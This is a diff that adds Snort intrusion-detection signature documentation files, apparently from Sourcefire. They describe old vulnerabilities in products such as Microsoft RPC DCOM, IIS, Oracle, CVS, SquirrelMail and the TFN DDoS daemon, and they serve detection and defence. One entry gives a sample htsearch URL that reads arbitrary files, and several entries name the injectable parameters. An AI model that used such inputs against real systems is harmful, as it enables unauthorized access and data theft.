+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file notification.php.
+
+--
+Affected Systems:
+	PHPOutsourcing IdeaBox 1.0
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the gorumDir variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3302.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3302
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1045.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1045
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/585.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+585
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) sadmind is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port sadmind is using.  Attackers can also learn what versions of the sadmind protocol are accepted by sadmind.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as sadmind run.  The sadmind RPC service is used by Solaris hosts to remotely perform distributed system administration tasks such as adding new users.  There is a vulnerability associated with sadmind that may cause a buffer overflow, allowing an attacker to execute abitrary code with the privileges of sadmind, possibly root. 
+
+--
+Affected Systems:
+Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6, and 7. 
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where sadmind runs.  This may be a precursor to an attack to exploit the sadmind buffer overflow.
+
+--
+Ease of Attack:
+Simple.  Exploit scripts are freely available. A worm was observed in 2001 that used the sadmind exploit (and an IIS vulnerability) to compromise systems and deface web pages. 
+
+--
+False Positives:
+If a legitimate remote user is allowed to access sadmind, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for sadmind, not probes of the sadmind service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the sadmind service itself. An attacker may attempt to go directly to the sadmind port without querying the portmapper service which, would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Original rule modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/866
+
+CERT:
+http://www.cert.org/advisories/CA-1999-16.html
+
+Arachnids:
+http://www.whitehats.com/info/IDS20
+
+
+--
--- /dev/null
+++ b/doc/signatures/2163.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2163
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000329.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000329
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Invision Power Board" application running on a webserver. Access to the file "class_post.php" using a remote file being passed as the "post_icon" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "post_icon" parameter in the "class_post.php" script used by the "Invision Power Board" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Invision Power Board
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2167.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2167
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000561.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000561
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "dotProject" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "login" parameter in the "ui.class.php" script 
+used by the "dotProject" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using dotProject
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2874.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2874
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_raw
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1602.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+1602
+
+--
+Summary:
+This event is generated when an attempt is made to access htsearch.
+
+--
+Impact:
+Severe. Unauthorized file access is possible.
+
+--
+Detailed Information:
+Some versions of htdig allow inclusions to be made from configuration files as a parameter to the htsearch function. Any file can be included by enclosing it in single quotes ('foo').
+
+Using this vulnerability, any single quoted input string (`....`) is included as an index file by htsearch. This allows an attacker to read any file on the host.
+
+This event is generated when an attempt is made to access the cgi script htsearch. Refer to the rules with sid 1600 and 1601 for tracking actual exploit attempts.
+
+--
+Affected Systems:
+HTDig versions 3.1.1, 3.1.2, 3.1.3, 3.1.4 and 3.2.0b1
+
+--
+Attack Scenarios:
+A input form with a textbox named "Exclude" and http post action handled by htsearch or a url similar to http://www.foo.com/cgi-bin/htsearch?Exclude=%60/anyfile%60 can be used to access files on your host. %60 is the single quote caracter "`".
+
+--
+Ease of Attack:
+Simple. No exploit scripts required
+
+--
+False Positives:
+If htdig is used as a search engine for a website, this rule will generate an event for each request for htsearch.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Related Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+
+-- 
+Additional References:
+Bugtraq:
+http://www.securityfocus.com/bid/1026
+
+--
--- /dev/null
+++ b/doc/signatures/2346.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2346
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+chatheader.php script which contains known vulnerabilities and
+is part of  the myPHPNuke web application running on a server.
+
+--
+Impact:
+Information gathering and possible cross site scripting attack.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the myPHPNuke web application running on a server.
+Multiple vulnerabilities exist in the application which can lead to
+cross site scripting attacks.
+
+--
+Affected Systems:
+	myPHPNuke 1.8.8
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including it in the
+Default_Theme parameter of the chatheader.php script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/694.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2272.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2272
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Coreutils LS.
+
+--
+Impact:
+Denial of Service, possible arbitrary code execution.
+
+--
+Detailed Information:
+The Coreutils ls command contains an integer overflow vulnerability
+which may present an attacker with an exploitation opportunity in
+software that uses this command. By supplying a large amount of data to
+the ls command in the form of the width variable, an attacker may cause
+a DoS to occur. It may also be possible to execute arbitrary code as the
+application becomes unstable.
+
+--
+Affected Systems:
+	Coreutils LS
+
+--
+Attack Scenarios:
+The attacker needs to supply a large amount of data in the width
+variable to the ls command.
+
+--
+Ease of Attack:
+Simple. No exploit software required although automated scripts do exist.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/286.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+286
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in the POP3 qpopper service on BSD systems.
+
+--
+Impact:
+An attacker can gain access to a shell running with root privileges.
+
+--
+Detailed Information:
+This rule looks for a piece of shell code (executable code) that is
+used to exploit a known vulnerability in an older version of the Qualcom
+based POP3 daemon distributed with BSD Unixes.
+
+--
+Affected Systems:
+*BSD systems using Qualcomm Qpopper 2.4
+
+--
+Attack Scenarios:
+The attack is done remotely and gives the attacker a command shell
+running with root privileges.
+
+--
+Ease of Attack:
+Simple.  An exploit is readily available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the available security patches from your vendor.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/133
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-1999-0006
+
+--
--- /dev/null
+++ b/doc/signatures/3109.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3109
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2107.txt
@@ -0,0 +1,75 @@
+Rule:
+
+
+--
+Sid:
+2107
+
+--
+Summary:
+This event is generated when a remote user uses invalid data within an
+IMAP CREATE command sent to port 143 on an internal server. This may
+indicate an attempt to exploit a buffer overflow vulnerability in the
+IMAP CREATE command in the Alt-N MDaemon IMAP server. This vulnerability
+may affect other IMAP implementations.
+
+--
+Impact:
+Remote execution of arbitrary code, which could allow an attacker to
+interfere with or crash mail services. The attacker must have a valid
+IMAP account and be authenticated by the mail server to attempt this exploit.
+
+--
+Detailed Information:
+Some versions of the Alt-N MDaemon IMAP server contain a vulnerability
+where, if an authenticated user creates a folder with a sufficiently
+long name, arbitrary code can be executed with system privileges. Note
+that this exploit can only be attempted by an authenticated user with a
+valid IMAP account on the mail server.
+
+--
+Affected Systems:
+	Alt-N MDaemon 6.7.5 or Alt-N MDaemon 6.7.9 IMAP servers.
+
+--
+Attack Scenarios:
+An authenticated user can create a new folder with a sufficiently long
+name, creating a buffer overflow condition. The attacker can then
+execute arbitrary code with system privileges, which may allow the
+attacker to interfere with or crash mail services.
+
+--
+Ease of Attack:
+Exploits exist, but the user must be authenticated before attempting the exploit.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7446
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11577
+
+--
--- /dev/null
+++ b/doc/signatures/238.txt
@@ -0,0 +1,61 @@
+Rule:
+--
+Sid:
+238
+
+--
+Summary:
+This event is generated when a Tribe Flood Network (TFN) Distributed Denial of Service (DDoS) daemon responds to a client request to spawn a shell.
+
+--
+Impact:
+Attempted DDoS.  If the listed source IP is in your network, it may be a TFN daemon.  If the listed destination IP is in your network, it may be a TFN client.
+
+--
+Detailed Information:
+The TFN DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. Clients communicate with daemons to inform them to launch attacks. A daemon will respond with a client request to spawn a shell with an ICMP echo reply with an ICMP identification number of 123, an ICMP sequence number of 0 and a string of "shell bound to port" in the payload.   
+
+--
+Affected Systems:
+Any TFN compromised host.
+
+--
+Attack Scenarios:
+After a host becomes a TFN daemon, it will respond to client requests.
+
+--
+Ease of Attack:
+Simple. TFN code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+Arachnids:
+http://www.whitehats.com/info/IDS182
+
+--
--- /dev/null
+++ b/doc/signatures/100000709.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000709
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "SquirrelMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "mailbox" parameter in the "search.php" script used by the "SquirrelMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using SquirrelMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2059.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2059
+
+--
+Summary:
+MsmMask.exe
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+Versions of MondoSearch prior to 4.4.5156 use a vulnerable version of a 
+cgi script named msmmask.exe. This script allows the attacker to view 
+the source of any file in a webservers root directory.
+
+vulnerabilities using the security scanner nessus.
+
+--
+Affected Systems:
+MondoSearch versions prior to 4.4.5156.
+
+--
+Attack Scenarios:
+The attacker needs to access the msmmask.exe script and request a file 
+in the servers web directory.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade the application to at least version 4.4.5156 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=11163
+
+--
--- /dev/null
+++ b/doc/signatures/2734.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2734
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_mview_propagation
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000456.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000456
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "SSPwiz" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "message" parameter in the "index.cfm" script 
+used by the "SSPwiz" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using SSPwiz
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2011.txt
@@ -0,0 +1,96 @@
+Rule:
+
+--
+Sid:
+2011
+
+--
+Summary:
+CVS is the Concurrent Versions System, commonly used to 
+help manage software development. It is possible for a remote
+attacker to exploit a bug in the cvs daemon that will allow the 
+perpetrator the ability to execute code, issue a denial of service, 
+compromise code being stored in CVS and read sensitive information. 
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources on the machine. Software development could 
+be halted, code could be lost or stolen and code auditing after the fact
+could affect delivery of software.
+
+--
+Detailed Information:
+Specially crafted directory requests can be used to exploit a double 
+free memory reference bug in the CVS software. It is possible to force 
+the CVS daemon to execute an error that returns a pointer to already 
+freed memory. This is a well known bug. This rule indicates a request 
+for a directory using invalid syntax.
+
+Since cvsd may be run as root via inetd, the compromise will present the
+attacker with root privileges on the machine. Any code the attacker is 
+able to execute will have root privileges.
+
+It is also possible for the attacker to bypass all write checks and be 
+able to write to the repository using the "anonymous" or "anoncvs" 
+accounts commonly used for read only access. The source code may then be
+compromised by the attacker who could choose to insert malicious code of
+his own making.
+
+If the CVS password database is writable by the CVS user the result is a
+remote root compromise.
+
+For CVS daemons running under changed root conditions (chroot), the rest
+of the operating system files may be protected but the entire CVS 
+directory structure is vulnerable.
+
+--
+Affected Systems:
+	CVS versions 1.11.4 and earlier
+	
+--
+Attack Scenarios:
+The attacker could pass a specially crafted directory request to trigger
+an error condition. The attacker may then be presented with the 
+opportunity to execute code or issue shell commands on some systems.
+
+--
+Ease of Attack:
+Simple, an exploit is available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+Connections to the server using zlib compression will not generate this
+event.
+
+--
+Corrective Action:
+Disable the CVS daemon in the file /etc/inetd.conf. Run the CVS daemon 
+as a user other than root that does not have a valid login to the 
+machine.
+
+Disable anonymous cvs access to the server.
+
+Update the CVS software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+www.cert.org/advisories/CA-2003-02.html
+www.kb.cert.org/vuls/id/650937
+
